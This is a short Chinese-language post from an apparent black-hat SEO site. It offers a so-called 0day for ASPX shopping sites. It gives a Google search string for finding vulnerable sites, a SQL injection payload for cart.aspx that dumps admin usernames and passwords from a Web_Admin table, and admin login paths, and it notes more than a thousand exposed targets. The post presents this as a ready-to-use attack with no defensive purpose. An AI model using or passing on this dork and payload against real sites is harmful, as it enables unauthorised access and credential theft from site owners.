黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

ASPX网站的0day

  直接爆出管理密码。

  也是利用注入漏洞。

  谷歌搜索关键字:inurl:scoreindex.aspx

  利用代码

  cart.aspx?act=buy&id=1

  and (Select Top 1 char(124)%2BisNull(cast([Name] as

  varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as

  varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass]

  From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name]

  desc,[Pass] desc)>0 —

  后台地址:/weblogin/Login.aspx

  后台地址/weblogin/index.aspx

  这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果。

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » ASPX网站的0day
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜